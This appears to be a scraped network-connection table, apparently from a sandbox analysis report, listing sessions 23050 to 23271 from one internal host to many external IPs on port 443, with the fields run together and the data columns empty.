                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23050192.168.2.1338250165.239.133.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23051192.168.2.135096835.179.122.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23052192.168.2.133527460.102.234.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23053192.168.2.1351692208.85.236.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23054192.168.2.1347126112.10.84.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23055192.168.2.1343572188.141.60.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23056192.168.2.1356672176.137.65.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23057192.168.2.135102448.8.25.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23058192.168.2.1334422207.119.93.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23059192.168.2.1335126195.174.25.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23060192.168.2.135941276.114.85.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23061192.168.2.1354260205.179.147.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23062192.168.2.1350456151.0.76.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23063192.168.2.1353016140.46.239.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23064192.168.2.1358668173.182.89.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23065192.168.2.1340694119.118.151.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23066192.168.2.1338810140.60.105.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23067192.168.2.1333870219.1.146.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23068192.168.2.1350578140.87.240.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23069192.168.2.1343778136.72.134.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23070192.168.2.133574431.97.195.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23071192.168.2.1342800139.215.115.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23072192.168.2.1342798217.92.142.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23073192.168.2.1340698193.248.55.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23074192.168.2.133288472.234.120.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23075192.168.2.136057484.157.51.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23076192.168.2.135896874.3.173.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23077192.168.2.136003454.111.10.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23078192.168.2.1345018124.2.81.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23079192.168.2.135251023.47.227.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23080192.168.2.134365412.92.152.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23081192.168.2.135597838.59.216.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23082192.168.2.135017075.35.203.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23083192.168.2.1347254217.155.137.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23084192.168.2.1338990199.29.221.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23085192.168.2.1358762166.249.154.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23086192.168.2.133594824.214.46.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23087192.168.2.1350898136.27.128.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23088192.168.2.1351516201.162.218.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23089192.168.2.134752442.83.70.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23090192.168.2.1358686139.192.229.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23091192.168.2.1338156205.192.0.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23092192.168.2.134529623.52.154.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23093192.168.2.1359132223.149.184.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23094192.168.2.13420142.213.253.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23095192.168.2.1347168216.88.130.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23096192.168.2.133347845.90.176.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23097192.168.2.135715240.21.19.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23098192.168.2.1333302118.115.166.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23099192.168.2.134820442.76.190.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23100192.168.2.135571898.230.235.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23101192.168.2.1344852108.206.240.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23102192.168.2.134313046.4.183.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23103192.168.2.1353694138.198.170.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23104192.168.2.1352780121.213.65.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23105192.168.2.1355270190.61.247.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23106192.168.2.135453446.76.225.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23107192.168.2.1353144165.219.168.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23108192.168.2.135661059.5.157.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23109192.168.2.135553694.11.253.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23110192.168.2.1358820162.111.115.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23111192.168.2.1334992119.20.232.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23112192.168.2.1344286221.5.28.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23113192.168.2.1355850186.99.215.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23114192.168.2.135254441.47.234.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23115192.168.2.1350656211.18.168.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23116192.168.2.1357544208.198.120.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23117192.168.2.134348290.221.117.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23118192.168.2.133748878.153.172.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23119192.168.2.1351150176.14.180.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23120192.168.2.1359572179.128.164.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23121192.168.2.134876461.116.19.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23122192.168.2.135449244.207.148.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23123192.168.2.133682493.111.1.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23124192.168.2.1358352221.180.87.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23125192.168.2.135673034.63.163.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23126192.168.2.1343156169.41.71.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23127192.168.2.1336018179.42.81.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23128192.168.2.1360796203.166.25.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23129192.168.2.134847240.154.173.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23130192.168.2.1359814131.210.146.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23131192.168.2.1342528131.236.239.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23132192.168.2.1359384168.3.115.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23133192.168.2.133827061.175.110.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23134192.168.2.1337352194.59.210.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23135192.168.2.134155652.47.224.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23136192.168.2.133668235.185.153.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23137192.168.2.1333348167.236.198.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23138192.168.2.135300061.241.158.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23139192.168.2.133790269.173.161.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23140192.168.2.135889031.194.12.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23141192.168.2.133549238.222.96.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23142192.168.2.133929442.8.152.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23143192.168.2.1351360132.68.221.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23144192.168.2.1349398200.34.146.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23145192.168.2.1359144157.68.206.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23146192.168.2.1353514165.1.180.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23147192.168.2.135722467.220.227.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23148192.168.2.1346894191.151.51.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23149192.168.2.1338780175.67.119.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23150192.168.2.1339328139.45.92.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23151192.168.2.134392440.193.155.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23152192.168.2.133483475.56.205.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23153192.168.2.1351716155.98.224.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23154192.168.2.1341778113.209.105.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23155192.168.2.1351826104.96.12.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23156192.168.2.136028419.33.253.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23157192.168.2.1343182121.125.133.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23158192.168.2.134012898.92.219.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23159192.168.2.134131427.20.142.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23160192.168.2.133479052.12.93.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23161192.168.2.134071477.209.210.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23162192.168.2.1349034117.46.44.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23163192.168.2.133906045.235.9.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23164192.168.2.135273097.199.104.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23165192.168.2.134059059.137.169.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23166192.168.2.1342990182.76.12.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23167192.168.2.1338844161.237.106.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23168192.168.2.135608860.76.115.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23169192.168.2.133739295.32.207.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23170192.168.2.134147083.239.17.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23171192.168.2.133672861.56.53.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23172192.168.2.134551459.190.245.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23173192.168.2.1337488157.197.197.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23174192.168.2.1357874160.23.181.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23175192.168.2.1345402146.195.212.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23176192.168.2.1333862108.45.179.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23177192.168.2.1352014168.124.41.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23178192.168.2.133633823.94.140.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23179192.168.2.135963887.73.151.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23180192.168.2.1342532193.148.197.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23181192.168.2.1344736150.137.101.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23182192.168.2.1333596176.49.155.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23183192.168.2.1335346147.249.75.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23184192.168.2.133408081.196.221.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23185192.168.2.135237697.44.235.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23186192.168.2.1360392186.25.4.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23187192.168.2.133909874.191.2.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23188192.168.2.133280840.142.165.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23189192.168.2.13563841.254.24.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23190192.168.2.1348246114.199.155.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23191192.168.2.136073831.11.253.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23192192.168.2.134244693.57.8.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23193192.168.2.1343480147.180.168.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23194192.168.2.1347972207.168.162.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23195192.168.2.135331445.134.18.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23196192.168.2.1340310170.143.136.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23197192.168.2.135801897.34.168.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23198192.168.2.1337194129.55.116.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23199192.168.2.134081098.85.44.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23200192.168.2.135347223.80.159.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23201192.168.2.134797266.179.158.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23202192.168.2.136069819.135.83.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23203192.168.2.1345932139.230.167.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23204192.168.2.1335506208.161.176.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23205192.168.2.1359432185.124.19.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23206192.168.2.1351514207.235.240.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23207192.168.2.1357878210.68.39.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23208192.168.2.1342132118.175.82.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23209192.168.2.1351946223.116.205.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23210192.168.2.1348810177.238.119.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23211192.168.2.133898867.193.15.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23212192.168.2.134594678.127.58.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23213192.168.2.13597508.172.194.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23214192.168.2.1343530140.81.238.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23215192.168.2.1335594189.18.57.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23216192.168.2.134044819.183.190.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23217192.168.2.1359696137.254.96.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23218192.168.2.135087689.64.200.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23219192.168.2.134083095.218.55.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23220192.168.2.1346782147.76.20.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23221192.168.2.135501644.223.196.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23222192.168.2.1337266193.76.65.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23223192.168.2.135845220.78.72.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23224192.168.2.1358208133.115.182.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23225192.168.2.135843869.206.135.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23226192.168.2.1335162206.19.69.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23227192.168.2.1340992106.3.183.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23228192.168.2.134515278.10.142.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23229192.168.2.1351398102.236.65.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23230192.168.2.1350052212.35.199.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23231192.168.2.133624089.201.154.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23232192.168.2.1341220192.149.157.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23233192.168.2.1354010204.26.178.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23234192.168.2.1348232211.240.43.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23235192.168.2.133766447.156.146.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23236192.168.2.1336876107.94.240.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23237192.168.2.13383022.21.171.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23238192.168.2.1333180103.7.254.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23239192.168.2.135999812.48.84.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23240192.168.2.1338114189.158.232.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23241192.168.2.134846042.92.205.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23242192.168.2.134245487.24.4.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23243192.168.2.134584666.113.218.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23244192.168.2.133580625.243.174.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23245192.168.2.13578585.119.9.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23246192.168.2.1342842171.219.130.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23247192.168.2.133335877.249.142.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23248192.168.2.1345038188.75.206.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23249192.168.2.134047864.183.186.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23250192.168.2.1337204138.108.141.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23251192.168.2.1341872171.54.148.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23252192.168.2.135828012.62.92.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23253192.168.2.1340528198.147.149.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23254192.168.2.134074070.166.45.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23255192.168.2.1336936129.126.148.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23256192.168.2.1359174143.169.130.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23257192.168.2.135289462.19.255.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23258192.168.2.1348632182.203.7.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23259192.168.2.1339844107.111.221.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23260192.168.2.1345216140.168.199.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23261192.168.2.1343192220.253.134.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23262192.168.2.135465059.54.77.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23263192.168.2.135398819.137.248.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23264192.168.2.1355666208.224.68.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23265192.168.2.1334404217.82.71.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23266192.168.2.1356626105.139.137.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23267192.168.2.1334908110.190.35.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23268192.168.2.1354374118.248.136.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23269192.168.2.13365461.21.74.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23270192.168.2.133585094.230.240.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23271192.168.2.1356086176.66.109.89443
